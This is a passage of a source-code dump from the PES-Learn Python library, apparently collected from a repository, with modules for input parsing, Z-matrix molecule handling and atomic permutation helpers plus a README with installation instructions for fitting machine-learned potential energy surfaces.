**Default**: None\n * **Possible values**: Any integer\n\n\n* `gp_ard` \n **Description:** Use auto-relevancy determination (ARD) in Gaussian process regression. If True, a length scale is optimized for each input value. If false, just one length scale is optimized. If gp_ard = opt, it is treated as a hyperparameter. False is typically better for high-dimensional inputs (>30).\n * **Type**: bool\n * **Default**: true\n * **Possible values**: true, false, or opt (treats as hyperparameter)\n\n\n* `nas_trial_layers` \n **Description:** Neural network hidden layer structures to try out during neural architecture search. A list of lists of numbers corresponding to the hidden layers and the number of nodes in each hidden layer. Must have at least 3 hidden layer structures. E.g. `[[16,16], [32], [64,64,64]]`\n * **Type**: List\n * **Default**: See `ml/neural_network.py`\n * **Possible values**: any list of lists of positive integers\n\n\n* `nn_precision` \n **Description:** Floating point precision for neural networks. 32 or 64 bit. For high precision use-cases, it is recommended to use 64 bit for stability and maximum fitting performance, though training is a little slower than 32 bit.\n * **Type**: int\n * **Default**: 32\n * **Possible values**: 32, 64\n \n* `` \n **Description:** \n * **Type**: string\n * **Default**: \n * **Possible values**: any string\n\n" }, { "alpha_fraction": 0.8154981732368469, "alphanum_fraction": 0.8154981732368469, "avg_line_length": 29.11111068725586, "blob_id": "43e44fd89e1632f2f841e5992844a458b903ba2d", "content_id": "bc3a5c08222f749410845720949bfb5d9d15c192", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 271, "license_type": "permissive", "max_line_length": 45, "num_lines": 9, "path": "/peslearn/ml/__init__.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "from . import data_sampler\nfrom . import gaussian_process\nfrom . import neural_network \nfrom . import preprocessing_helper \nfrom . import model\n\nfrom .gaussian_process import GaussianProcess\nfrom .data_sampler import DataSampler\nfrom .neural_network import NeuralNetwork\n" }, { "alpha_fraction": 0.4896324872970581, "alphanum_fraction": 0.4959245026111603, "avg_line_length": 56.31147384643555, "blob_id": "c65026af505f4608e0217d70240f380547226557", "content_id": "47bd0f09b16d96bc761d4cf9858a6b87d9a43ad5", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 6993, "license_type": "permissive", "max_line_length": 176, "num_lines": 122, "path": "/peslearn/input_processor.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "\"\"\"\nA class for extracting information from the main input of the user\n\"\"\"\n\nfrom .utils import regex \nfrom .datagen import molecule\nimport re\nimport collections\nimport numpy as np\nimport itertools as it\nimport timeit\nimport ast\n\nclass InputProcessor(object):\n \"\"\"\n A Class which handles information contained within an input file\n \"\"\"\n def __init__(self, input_string):\n # Remove all comments denoted by '#'\n self.full_string = re.sub('\\s*#.+', '', input_string)\n regex_number = regex.intcoords_regex\n if re.search(regex_number, self.full_string):\n self.zmat_string = re.findall(regex.intcoords_regex, self.full_string)[0] \n self.intcos_ranges = None \n self.keywords = self.get_keywords()\n self.ndisps = None\n \n def set_keyword(self, d):\n for key, val in d.items():\n self.keywords[key] = val\n \n def get_keywords(self):\n \"\"\"\n Find keyword definitions within the input file\n \"\"\"\n # keywords which have values that are strings, not other datatypes\n regex_keywords = {'energy_regex': None, 'gradient_header': None, 'gradient_footer': None, \n 'gradient_line': None, 'input_name': 'input.dat', 'output_name': 'output.dat', 'pes_dir_name': 'PES_data', 'pes_name': 'PES.dat'}\n string_keywords = {'energy': None, # parse energies with 'cclib', 'regex'\n 'energy_regex': None, # a regular expression string, surround by '' or \"\"\n 'energy_cclib': None, # a cclib energy option. 'scfenergies', 'mpenergies', 'ccenergies'\n 'gradient': None, # parse gradients with 'cclib', 'regex'\n 'gradient_header': None, # gradient header regular expression string\n 'gradient_footer': None, # gradient footer regular expression string\n 'gradient_line': None, # regular expression string for one line of the cartesian gradient\n 'input_name': 'input.dat', # what to call new input files generated from template, can be any name\n 'output_name': 'output.dat', # the name of electronic structure theory output files corresponding to input_name\n 'ml_model': 'gp', # 'gp', 'nn'\n 'mode': None, # 'generate', 'parse', 'learn', or shorthand: 'g', 'p', 'l'\n 'pes_name': 'PES.dat', # any name\n 'pes_dir_name': 'PES_data', # any name\n 'pes_redundancy': 'false', # 'true'\n 'pes_format': 'interatomics', # 'zmat'\n 'remove_redundancy': 'true', # 'false'\n 'remember_redundancy' : 'false', # 'true'\n 'grid_reduction' : None, # any int\n 'eq_geom' : None, #[1.05, 1.15, 104.5] etc\n 'use_pips': 'true', #'false'\n 'sort_pes': 'true', #'false'\n 'sampling': 'structure_based', # 'structure_based','sobol', 'smart_random', 'random', 'energy_ordered'\n 'n_low_energy_train': 0, # any int\n 'training_points': None, # any int\n 'validation_points': None, # any int\n 'hp_maxit': 20, # any int\n 'rseed': None, # any int\n 'gp_ard': 'true', # 'true', 'false'. 'opt' treats as hyperparameter\n 'nas_trial_layers': None, # List of lists e.g. [[10,], [10,10,10], [50,50]]\n 'nn_precision': 32, # neural network floating point precision 32 or 64\n 'hp_opt': 'true'} # 'false'\n\n for k in string_keywords:\n match = re.search(k+\"\\s*=\\s*(.+)\", self.full_string)\n # if the keyword is mentioned\n if match:\n value = str(match.group(1))\n # if not a regex, remove spaces and make lower case \n # for later boolean checks on keywords\n if k not in regex_keywords:\n value = value.lower().strip()\n # if keyword is raw text, add quotes so it is a string\n if re.match(\"[a-z\\_]+\", value):\n if (r\"'\" or r'\"') not in value:\n value = \"\".join((r'\"',value,r'\"',))\n try:\n value = ast.literal_eval(value)\n # check if keyword is integer\n string_keywords[k] = value\n except:\n raise Exception(\"\\n'{}' is not a valid option for {}. Entry should be plain text or a string, i.e., surrounded by single or double quotes.\".format(value,k))\n return string_keywords\n \n\n def extract_intcos_ranges(self):\n \"\"\"\n Find within the inputfile path internal coordinate range definitions\n \"\"\"\n # create molecule object to obtain coordinate labels\n self.zmat_string = re.findall(regex.intcoords_regex, self.full_string)[0] \n self.mol = molecule.Molecule(self.zmat_string)\n geomlabels = self.mol.geom_parameters \n ranges = collections.OrderedDict()\n # for every geometry label look for its range identifer, e.g. R1 = [0.5, 1.2, 25]\n for label in geomlabels:\n # check to make sure parameter isn't defined more than once\n if len(re.findall(\"\\W\" + label+\"\\s*=\\s*\", self.full_string)) > 1:\n raise Exception(\"Parameter {} defined more than once.\".format(label))\n\n # if geom parameter has a geometry range, save it\n match = re.search(label+\"\\s*=\\s*(\\[.+\\])\", self.full_string)\n if match:\n try:\n ranges[label] = ast.literal_eval(match.group(1))\n except: \n raise Exception(\"Something wrong with definition of parameter {} in input. Should be of the form [start, stop, # of points] or a fixed value\".format(label))\n # if it has a fixed value, save it\n else:\n match = re.search(label+\"\\s*=\\s*(-?\\d+\\.?\\d*)\", self.full_string)\n if not match:\n raise Exception(\"\\nDefinition of parameter {} not found in geometry input. \\\n \\nThe definition is either missing or improperly formatted\".format(label))\n ranges[label] = [float(match.group(1))]\n self.intcos_ranges = ranges\n\n" }, { "alpha_fraction": 0.5703391432762146, "alphanum_fraction": 0.5819405913352966, "avg_line_length": 46.39615249633789, "blob_id": "5d62c9ebb1d14ac69b6478a8a190ae30f8ad9070", "content_id": "be9c5455ebcb5a7eea69747703e6da5b6727294c", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 12326, "license_type": "permissive", "max_line_length": 145, "num_lines": 260, "path": "/peslearn/datagen/molecule.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "from .. import constants\nfrom ..utils import regex\nfrom ..utils import geometry_transform_helper as gth \nimport re\nimport math\nimport numpy as np\nimport collections\n\n\"\"\"\nContains Atom and Molecule classes for reading, saving and editing the geometry of a molecule \nBuilt around reading internal coordinates \n\"\"\"\n\nclass Atom(object):\n \"\"\"\n The Atom class holds information about the geometry of an atom\n\n Parameters\n ----------\n label : str\n The atomic symbol\n r_idx : str\n The bond connectivity index, as represented in a Z-matrix\n a_idx : str\n The angle connectivity index, as represented in a Z-matrix\n d_idx : str\n The dihedral connectivity index, as represented in a Z-matrix\n intcoords : dict\n A dictionary of geometry parameter labels (e.g. \"R1\") and the value for this atom\n coords : array\n An array of cartesian coordinates for this atom\n \"\"\"\n def __init__(self, label, r_idx=None, a_idx=None, d_idx=None, intcoords=collections.OrderedDict()):\n self.label = label\n self.r_idx = r_idx\n self.a_idx = a_idx\n self.d_idx = d_idx\n self.intcoords = intcoords\n self.update_intcoords\n self.coords = np.array([None, None, None]) \n \n def update_intcoords(self):\n self.geom_vals = list(self.intcoords.values())\n while len(self.geom_vals) < 3:\n self.geom_vals.append(None)\n self.rval = self.geom_vals[0]\n self.aval = self.geom_vals[1]\n self.dval = self.geom_vals[2]\n\n \nclass Molecule(object):\n \"\"\"\n The Molecule class holds geometry information about all the atoms in the molecule\n Requires initialization with a file string containing internal coordinates\n\n Parameters\n ----------\n zmat_string : str\n A standard Z-Matrix defining internal coordinates. Defining within a multiline string as one would \n when using an electronic structure package is recommended. Example:\n '''\n O\n H 1 r1\n H 1 r2 2 a1\n '''\n\n Dummy atoms can be specified with 'X', and one can force coordinates to be identical:\n '''\n C\n X 1 RDUM\n H 1 R 2 A\n H 1 R 2 A 3 D120\n H 1 R 2 A 4 D120\n '''\n \"\"\"\n def __init__(self, zmat_string):\n self.zmat_string = zmat_string\n self.extract_zmat(self.zmat_string)\n \n \n def extract_zmat(self, zmat_string):\n \"\"\"\n This should maybe just be in the init method.\n Take the string which contains an isolated Z matrix definition block,\n and extract information and save the following attributes:\n self.n_atoms - the number of atoms in the molecule (including dummy)\n self.n_dummy - the number of dummy atoms\n self.zmat_indices - connectivity indices in Z-Matrix in the order they appear\n self.atom_labels - a list of element labels 'H', 'O', etc., including dummy atoms\n self.real_atom_labels - a list of element labels exluding dummy atoms\n self.geom_parameters - a list of geometry labels in the order they appear \n in the supplied Z matrix 'R3', 'A2', etc.\n self.unique_geom_parameters - a list of unique geometry labels in the order they appear\n in the supplied Z matrix\n self.atoms - a list of Atom objects containing complete Z matrix information for each Atom\n self.atomtype_dict - a dictionary of atom labels and the number of that atom, sorted by number of occurances \n self.sorted_atom_counts - a list of tuples, ('atom_label', number of occurances) sorted by highest number of occurances \n self.atom_count_vector - a list of the number of each atom. Length is number of unique atoms, each value is the number \n of a particular atom, sorted in the same way as self.sorted_atom_counts\n self.std_order_atoms - a list of Atom objects in the order according to sorted_atom_counts\n self.std_order_atom_labels - a list of atom element labels in standard order\n self.std_order_permutation_vector - a list of indices required to permute given atom order to standard order \n (most common elements first, alphabetical tiebreaker), AND omit dummy atoms\n self.std_order_bond_types - a list of bond types (HC, OH, etc) in standard order of interatomic distances\n self.alpha_bond_types - a list of bond types in alphabetical order\n self.alpha_bond_types_indices - a list of the indices that would make the std_order_bond_types alphabetical\n self.alpha_bond_types_first_occur_indices - the index of the first occurance of each new bond type in the alphabetical bond types lists. \n Used for subset sorting within bond types.\n self.interatomic_labels - a list of interatomic distance labels\n self.molecule_type - a string with a generic molecule type label, A2BC, A2B6, etc.\n \"\"\"\n # grab array-like representation of zmatrix and count the number of atoms \n zmat_array = [line.split() for line in zmat_string.splitlines() if line]\n self.n_atoms = len(zmat_array)\n\n tmp = list(np.concatenate([i[1::2] for i in zmat_array]))\n self.zmat_indices = np.array([int(i) for i in tmp])\n\n # find geometry parameter labels \n # atom labels will always be at index 0, 1, 3, 6, 6++4... \n # and geometry parameters are all other matches\n tmp = re.findall(regex.coord_label, zmat_string)\n self.atom_labels = []\n for i, s in enumerate(tmp):\n if (i == 0) or (i == 1) or (i == 3):\n self.atom_labels.append(tmp[i])\n if ((i >= 6) and ((i-6) % 4 == 0)):\n self.atom_labels.append(tmp[i])\n\n self.n_dummy = len([x for x in self.atom_labels if x.lower() == 'x'])\n self.real_atom_labels = [x for x in self.atom_labels if x.lower() != 'x']\n\n self.geom_parameters = [x for x in tmp if x not in self.atom_labels]\n self.unique_geom_parameters = list(collections.OrderedDict.fromkeys(self.geom_parameters))\n\n self.atoms = []\n for i in range(self.n_atoms):\n label = zmat_array[i][0]\n intcoords = collections.OrderedDict()\n r_idx, a_idx, d_idx = None, None, None\n if (i >= 1):\n r_idx = int(zmat_array[i][1]) - 1\n intcoords[zmat_array[i][2]] = None\n if (i >= 2):\n a_idx = int(zmat_array[i][3]) - 1\n intcoords[zmat_array[i][4]] = None\n if (i >= 3):\n d_idx = int(zmat_array[i][5]) - 1\n intcoords[zmat_array[i][6]] = None\n self.atoms.append(Atom(label, r_idx, a_idx, d_idx, intcoords))\n\n # get standard order atomtypes and atomtype_vector \n self.sorted_atom_counts = collections.Counter(self.real_atom_labels).most_common()\n # sort first by occurances in decreasing order, then alphabetically\n self.sorted_atom_counts = sorted(self.sorted_atom_counts, key = lambda x: (-x[1], x[0]))\n self.atom_count_vector = [val[1] for val in self.sorted_atom_counts] \n\n self.std_order_atoms = []\n for tup in self.sorted_atom_counts:\n #for i in range(tup[1]):\n for atom in self.atoms:\n if atom.label == tup[0]:\n self.std_order_atoms.append(atom)\n\n self.std_order_atom_labels = [atom.label for atom in self.std_order_atoms]\n\n # Find permutation vector to permute given atom order to standard order (most common elements first, \n # alphabetical tiebreaker), and omit dummy atoms\n std_order_permutation_vector = []\n tmp_atom_labels = self.atom_labels.copy()\n for i,j in enumerate(self.std_order_atom_labels):\n for k,l in enumerate(tmp_atom_labels):\n if j == l:\n std_order_permutation_vector.append(k)\n tmp_atom_labels[k] = 'done'\n continue\n self.std_order_permutation_vector = np.array(std_order_permutation_vector)\n\n\n l = len(self.std_order_atom_labels)\n tmp = np.empty((l,l),dtype=object)\n for i in range(l):\n for j in range(l):\n tmp[i,j] = ''.join(sorted(self.std_order_atom_labels[i] + self.std_order_atom_labels[j]))\n tmp2 = tmp[np.tril_indices(len(tmp), -1)]\n self.std_order_bond_types = list(tmp2)\n self.alpha_bond_types = np.sort(tmp2)\n # allows to re-sort bond distances in dataframe to bond type sorting w/fancy indexing\n self.alpha_bond_types_indices = np.argsort(tmp2) \n \n self.alpha_bond_types_first_occur_indices = [0]\n previous = None\n for i,l in enumerate(self.alpha_bond_types):\n if i>0:\n if l != previous:\n self.alpha_bond_types_first_occur_indices.append(i) \n previous = l\n \n \n\n n_interatomics = int(0.5 * (self.n_atoms * self.n_atoms - self.n_atoms))\n self.interatomic_labels = []\n for i in range(n_interatomics):\n self.interatomic_labels.append(\"r%d\" % (i))\n \n # define molecule type, A2BC, A2B3C2... etc\n letters = ['A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L']\n self.molecule_type = ''\n for i, a in enumerate(self.atom_count_vector):\n self.molecule_type += letters[i]\n if a > 1:\n self.molecule_type += str(a)\n\n def update_intcoords(self, disp):\n \"\"\"\n Disp is a dictionary of geometry parameters and their new values, in angstrom and degrees\n {'R1': 1.01, 'R2':2.01, 'A1':104.5 ...}\n \"\"\"\n for key in disp:\n for atom in self.atoms:\n if key in atom.intcoords:\n atom.intcoords[key] = disp[key]\n # update Atom variables since intcoords maybe was changed, some redundancy here\n for atom in self.atoms:\n atom.update_intcoords()\n\n def zmat2xyz(self):\n \"\"\"\n Deprecated in favor of utils.geometry_transform_helper.vectorized_zmat2xyz()\n\n Converts Z-matrix representation to cartesian coordinates\n Changes element ordering to be the most common atom to least common atom\n Assumes Z-matrix is using degrees\n \"\"\"\n if (self.n_atoms >= 1):\n self.atoms[0].coords = np.array([0.0, 0.0, 0.0])\n if (self.n_atoms >= 2):\n self.atoms[1].coords = np.array([0.0, 0.0, self.atoms[1].rval])\n if (self.n_atoms >= 3):\n r1, r2 = self.atoms[1].rval, self.atoms[2].rval\n rn1, rn2 = self.atoms[1].r_idx, self.atoms[2].r_idx\n a1 = self.atoms[2].aval * constants.deg2rad \n y = r2*math.sin(a1)\n z = self.atoms[rn2].coords[2] + (1-2*float(rn2==1))*r2*math.cos(a1)\n self.atoms[2].coords = np.array([0.0, y, z])\n for i in range(3, self.n_atoms):\n atom = self.atoms[i]\n coords1 = self.atoms[atom.r_idx].coords\n coords2 = self.atoms[atom.a_idx].coords\n coords3 = self.atoms[atom.d_idx].coords\n self.atoms[i].local_axes = gth.get_local_axes(coords1, coords2, coords3)\n bond_vector = gth.get_bond_vector(atom.rval, atom.aval * constants.deg2rad, atom.dval * constants.deg2rad)\n disp_vector = np.array(np.dot(bond_vector, self.atoms[i].local_axes))\n for p in range(3):\n atom.coords[p] = self.atoms[atom.r_idx].coords[p] + disp_vector[p]\n\n # get cartesians in \"standard order\", i.e. give coordinates of most common occuring atom first (e.g. H H H C C O )\n # omit dummy atoms in cartesians\n cartesian_coordinates = [atom.coords for atom in self.std_order_atoms if atom.label != 'X']\n return np.array(cartesian_coordinates)\n\n \n" }, { "alpha_fraction": 0.25515463948249817, "alphanum_fraction": 0.25515463948249817, "avg_line_length": 41.77777862548828, "blob_id": "93df9688cefc7896286cd0dc81b835bcdb30925f", "content_id": "c2a6146dc2b65c2f4eef692b5f1efc5ab44cb518", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 388, "license_type": "permissive", "max_line_length": 66, "num_lines": 9, "path": "/peslearn/utils/printing_helper.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "\n\n\ndef hyperopt_init():\n pass\n\ndef hyperopt_complete():\n print(\"\\n###################################################\")\n print(\"# #\")\n print(\"# Hyperparameter Optimization Complete!!! #\")\n print(\"# #\")\n print(\"###################################################\\n\")\n" }, { "alpha_fraction": 0.599216103553772, "alphanum_fraction": 0.614669680595398, "avg_line_length": 34.288536071777344, "blob_id": "e8e70ffb58a6332803e3ba072d0564fb01bcb707", "content_id": "56e3dd65493b7753b640f9b04b29c6df31cc40d9", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 8930, "license_type": "permissive", "max_line_length": 141, "num_lines": 253, "path": "/peslearn/utils/permutation_helper.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "import numpy as np\nimport itertools as it\nimport copy\n\ndef generate_permutations(k):\n \"\"\"\n Generates a list of lists of all possible orderings of k indices\n\n Parameters\n ----------\n k : int\n The number of elements in a permutation group. \n\n Returns\n ---------\n permutations : list\n A list of all possible permutations of the set {1, 2, ..., k}\n \"\"\"\n permutations = []\n for perm in (it.permutations(range(k))):\n permutations.append(list(perm))\n return permutations\n\n\ndef find_cycles(perm):\n \"\"\"\n Finds every possible cycle which results in the given permutation\n\n Parameters\n ----------\n perm : list\n Some permutation vector\n\n Returns\n ----------\n cycles : list\n A list of cycles (permutation operations)\n\n Example\n -------\n the permutation [3,1,2] is obtained by permuting [1,2,3] with the cycle [1,2,3]\n read as \"1 goes to 2, 2 goes to 3, 3 goes to 1\".\n Sometimes cycles are products of more than one subcycle, e.g. (12)(34)(5678)\n \"\"\"\n pi = {i: perm[i] for i in range(len(perm))}\n cycles = []\n\n while pi:\n elem0 = next(iter(pi)) # arbitrary starting element\n this_elem = pi[elem0]\n next_item = pi[this_elem]\n\n cycle = []\n while True:\n cycle.append(this_elem)\n del pi[this_elem]\n this_elem = next_item\n if next_item in pi:\n next_item = pi[next_item]\n else:\n break\n cycles.append(cycle[::-1])\n\n # only save cycles of size 2 and larger\n cycles[:] = [cyc for cyc in cycles if len(cyc) > 1]\n return cycles\n\n\ndef generate_bond_indices(natoms):\n \"\"\"\n Finds the array of bond indices of an interatomic distance matrix, in row wise order:\n [[0,1], [0,2], [1,2], [0,3], [1,3], [2,3], ..., [0, natoms], [1, natoms], ...,[natoms-1, natoms]]\n \n Parameters\n ----------\n natoms: int\n The number of atoms\n\n Returns\n ----------\n bond_indices : list\n A list of lists, where each sublist is the subscripts of an interatomic distance\n from an interatomic distance matrix representation of a molecular system.\n e.g. r_12, r_01, r_05 \n \"\"\"\n # initialize j as the number of atoms\n j = natoms - 1\n # now loop backward until you generate all bond indices \n bond_indices = []\n while j > 0:\n i = j - 1\n while i >= 0:\n new = [i, j]\n bond_indices.insert(0, new)\n i -= 1\n j -= 1\n return bond_indices\n\ndef molecular_cycles(atomtype_vector):\n \"\"\"\n Finds the complete set of cycles that may act on a molecular system.\n Given an atomtype vector, containing the number of each atom:\n 1. generate the permutations of each atom\n 2. generate the cycles of each atom\n 3. adjust the indices to be nonoverlapping, so that each atom has a unique set of indices.\n For example, For an A2BC system, the indices may be assigned as follows: A 0,1; B 2; C 3; \n while the methods generate_permutations and find_cycles index from 0 for every atom, so we adjust the indices of every atom appropriately\n \n Parameters \n ---------\n atomtype_vector : list\n A list of the number of each atom in a molecular system, e.g., for an A2BC system, \n atomtype_vector would be [2,1,1].\n \n Returns\n --------\n cycles_by_atom : list\n The cycle permutation operators which act on each atom. (?)\n \"\"\"\n permutations_by_atom = []\n for atom in atomtype_vector:\n # add the set of permutations for each atom type to permutations_by_atom\n permutations_by_atom.append(generate_permutations(atom)) # an array of permutations is added for atom type X\n cycles_by_atom = []\n # each atom has a set of permutations, saved in permutations_by_atom \n for i, perms in enumerate(permutations_by_atom):\n cycles = []\n # find the cycles of each permutation and append to cycles, then append cycles to cycles_by_atom\n for perm in perms:\n cyc = find_cycles(perm)\n if cyc: # dont add empty cycles (identity permutation)\n cycles.append(cyc)\n cycles_by_atom.append(cycles)\n # now update the indices of the second atom through the last atom since they are currently indexed from zero\n # to do this we need to know the number of previous atoms, num_prev_atoms\n atomidx = 0\n num_prev_atoms = 0\n for atom in cycles_by_atom[1:]:\n num_prev_atoms += atomtype_vector[atomidx]\n for cycle in atom:\n for subcycle in cycle: # some cycles are composed of two or more subcycles (12)(34) etc.\n for i, idx in enumerate(subcycle):\n subcycle[i] = idx + num_prev_atoms\n atomidx += 1\n return cycles_by_atom\n\ndef permute_bond(bond, cycle):\n \"\"\"\n Permutes a bond indice if the bond indice is affected by the permutation cycle.\n\n Parameters\n ----------\n bond : list\n A list of length 2, a subscript of an interatom distance\n cycle : list\n A cycle-notation permutation operation.\n\n Returns\n -------\n bond : the permuted bond\n \"\"\"\n count0 = 0\n count1 = 0\n # if the bond indice matches the cycle indice, set the bond indice equal to the next indice in the cycle\n # we count so we dont change a bond indice more than once.\n # If the cycle indice is at the end of the list, the bond indice should become the first element of the list since thats how cycles work.\n # theres probably a better way to have a list go back to the beginning\n for i, idx in enumerate(cycle):\n if (bond[0] == idx) and (count0 == 0):\n try:\n bond[0] = cycle[i+1]\n except:\n bond[0] = cycle[0]\n count0 += 1\n\n if (bond[1] == idx) and (count1 == 0):\n try:\n bond[1] = cycle[i+1]\n except:\n bond[1] = cycle[0]\n count1 += 1\n # sort if the permutation messed up the order. if you convert 1,2 to 2,1, for example \n bond.sort()\n return bond\n\n\ndef permute_bond_indices(atomtype_vector):\n \"\"\"\n Permutes the set of bond indices of a molecule according to the complete set of \n valid molecular permutation cycles.\n\n Parameters\n ----------\n atomtype_vector : list\n A list of the number of each atom in a molecular system, e.g., for an A3B8C system, \n atomtype_vector would be [3,8,1].\n\n Returns\n --------\n bond_indice_permutations: list\n A list of all possible bond indice permutations of the interatomic distances \n The length is equal to the number of atomic permutations\n \"\"\"\n natoms = sum(atomtype_vector)\n bond_indices = generate_bond_indices(natoms)\n cycles_by_atom = molecular_cycles(atomtype_vector)\n\n bond_indice_permutations = [] # interatomic distance matrix permutations\n for atom in cycles_by_atom:\n for cycle in atom:\n tmp_bond_indices = copy.deepcopy(bond_indices) # need a deep copy, list of lists\n for subcycle in cycle:\n for i, bond in enumerate(tmp_bond_indices):\n tmp_bond_indices[i] = permute_bond(bond, subcycle)\n bond_indice_permutations.append(tmp_bond_indices)\n return bond_indice_permutations\n\ndef induced_permutations(atomtype_vector, bond_indice_permutations):\n \"\"\"\n Given the original bond indices list [[0,1],[0,2],[1,2]...] and a permutation of this bond indices \n list (which is found by permute_bond_indices), find the permutation vector that maps the original \n to the permuted list. Do this for all permutations of the bond indices list. \n The result is complete set induced interatomic distance matrix permutatations caused \n by the molecular permutation cycles.\n\n Parameters\n ---------\n atomtype_vector : list\n A list of the number of each atom in a molecular system, e.g., for an A3B8C system, \n atomtype_vector would be [3,8,1].\n bond_indice_permutations: list\n A list of all possible bond indice permutations of the interatomic distances \n The length is equal to the number of atomic permutations. (?)\n\n Returns\n ---------\n induced_perms : list\n The induced interatom distance permutations caused by the atomic permutation operations. \n In row-wise order of the interatomic distance matrix: [r01, r02, r12, r03, r13, r12...]\n \"\"\"\n natoms = sum(atomtype_vector)\n bond_indices = generate_bond_indices(natoms)\n\n induced_perms = []\n for bip in bond_indice_permutations:\n perm = []\n for bond1 in bond_indices:\n for i, bond2 in enumerate(bip):\n if bond1 == bond2:\n perm.append(i)\n # cycle = find_cycles(perm) \n induced_perms.append(perm)\n return induced_perms\n\n\n" }, { "alpha_fraction": 0.7647808194160461, "alphanum_fraction": 0.7711519002914429, "avg_line_length": 53.5, "blob_id": "ebfeaa6fc4b0a2131e6c9be6efaf6949e5c44a4f", "content_id": "da989262a347004c7269d0ceab054378ecbb8838", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Markdown", "length_bytes": 3924, "license_type": "permissive", "max_line_length": 383, "num_lines": 72, "path": "/README.md", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "# PES-Learn\n[![Build Status](https://travis-ci.org/CCQC/PES-Learn.svg?branch=master)](https://travis-ci.org/CCQC/PES-Learn)\n[![License](https://img.shields.io/badge/License-BSD%203--Clause-blue.svg)](https://opensource.org/licenses/BSD-3-Clause)\n\nPES-Learn is a Python library designed to fit system-specific Born-Oppenheimer potential energy surfaces using modern machine learning models. PES-Learn assists in generating datasets, and features Gaussian process and neural network model optimization routines. The goal is to provide high-performance models for a given dataset without requiring user expertise in machine learning.\n\nThis project is young and under active development. It is recommended to take a look at the [Tutorials](1_Tutorials), the [FAQ page](2_FAQ/FAQ.md), and the list of [keyword options](3_Keywords/keywords.md) before using PES-Learn for research purposes. More documentation will be added periodically. Questions and comments are encouraged; please consider submitting an issue. \n\n## Features\n\n* **Ease of Use**\n * PES-Learn can be run by writing an input file and running the code (much like most electronic structure theory packages)\n * PES-Learn also features a Python API for more advanced workflows\n * Once ML models are finished training, PES-Learn automatically writes a Python file containing a function for evaluating the energies at new geometries. \n \n* **Data Generation**\n * PES-Learn supports input file generation and output file parsing for arbitrary electronic structure theory packages such as Psi4, Molpro, Gaussian, NWChem, etc. \n * Data is generated with user-defined internal coordinate displacements with support for:\n * Redundant geometry removal\n * Configuration space filtering\n\n* **Automated Data Transformation**\n * Rotation, translation, and permutation invariant molecular geometry representations\n\n* **Automated Machine Learning Model Generation**\n * Neural network models are built using PyTorch\n * Gaussian process models are built using GPy\n\n* **Hyperparameter Optimization**\n\n\n## Installation Instructions \nPES-Learn has been tested and developed on Linux, Mac, and Windows 10 through the Windows Subsystem for Linux. To install using `pip`: \nClone the repository: \n`git clone https://github.com/adabbott/PES-Learn.git` \nChange into top-level directory: \n`cd PES-Learn` \nInstall PES-Learn and all dependencies: \n`python setup.py install` \nTo avoid having to re-install the package whenever a change is made to the code, run\n`pip install -e .` \n### Install using an Anaconda environment\nThe above procedure works just fine, however for performance and stability, we recommend installing all PES-Learn dependencies in a clean Anaconda environment. \nAfter installing [Anaconda for Python3](https://www.anaconda.com/distribution/), create and activate an environment: \n```conda create -n peslearn python=3.6``` \n```conda activate peslearn``` \nThe required dependencies can be installed in one line: \n```conda install -c conda-forge -c pytorch -c omnia gpy pytorch scikit-learn pandas hyperopt cclib``` \nThen install the PES-Learn package: \n`git clone https://github.com/adabbott/PES-Learn.git` \n`python setup.py install` \n`pip install -e .` \n\n\nTo update PES-Learn in the future, run `git pull` while in the top-level directory `PES-Learn`.\n\nTo run the test suite, you need pytest: `pip install pytest-cov` \nTo run tests, in the top-level directory called `PES-Learn`, run: `py.test -v tests/`\n\n## Citing PES-Learn\n[PES-Learn: An Open-Source Software Package for the Automated Generation of Machine Learning Models of Molecular Potential Energy Surfaces ](https://pubs.acs.org/doi/10.1021/acs.jctc.9b00312)\n\nBibtex:\n```\n```\n\n\n\n\n## Funding \nThis project is a collaboration with the [Molecular Sciences Software Institute](http://molssi.org).\nThe author gratefully acknowledges MolSSI for funding the development of this software.\n" }, { "alpha_fraction": 0.6047194600105286, "alphanum_fraction": 0.6193032264709473, "avg_line_length": 38.49599838256836, "blob_id": "0762bb08d4fe2af210c9e1dfaf8e3f5f1b074efd", "content_id": "0a6f122682af50d4a9bdee220773d031279d4b28", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 9874, "license_type": "permissive", "max_line_length": 154, "num_lines": 250, "path": "/peslearn/lib/induced_permutations.py", "repo_name": "zero0911/PES-Learn", "src_encoding": "UTF-8", "text": "# This code aims to take an arbitrary molecular system AnBmCp... with any number of like atoms and:\n# 1. Determine the atom permutation operations (cycles) of the permutation groups Sn, Sm, Sp ... \n# 2. Find the induced permutations of the atom permutation operations of Sn, Sm, Sp ... on the set of interatomic distances\n# 3. Export Singular code to derive the fundamental invariants\n# Result: a generalized algorithm for obtaining a permutationally invariant basis for geometrical parameters so that the PES is permutation invariant\n\nimport numpy as np\nimport itertools as it\nimport math\nimport copy\n\ndef generate_permutations(k):\n \"\"\"\n Generates a list of lists of all possible orderings of k indices\n \"\"\"\n f_k = math.factorial(k)\n A = []\n for perm in (it.permutations(range(k))):\n A.append(list(perm)) \n return A\n\n\ndef find_cycles(perm):\n \"\"\"\n Finds the cycle(s) required to get the permutation. For example,\n the permutation [3,1,2] is obtained by permuting [1,2,3] with the cycle [1,2,3]\n read as \"1 goes to 2, 2 goes to 3, 3 goes to 1\".\n Sometimes cycles are products of more than one subcycle, e.g. (12)(34)(5678)\n \"\"\"\n pi = {i: perm[i] for i in 